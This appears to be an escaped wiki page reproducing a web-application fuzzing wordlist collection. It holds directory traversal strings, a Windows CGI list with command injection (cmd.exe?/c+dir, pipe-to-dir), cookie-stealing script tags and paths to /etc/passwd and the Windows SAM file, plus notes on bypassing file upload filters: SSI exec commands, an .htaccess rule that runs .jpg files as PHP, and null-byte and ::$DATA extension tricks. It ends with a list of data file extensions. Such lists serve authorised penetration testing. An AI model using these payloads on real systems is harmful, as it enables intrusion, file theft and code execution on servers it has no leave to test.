.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
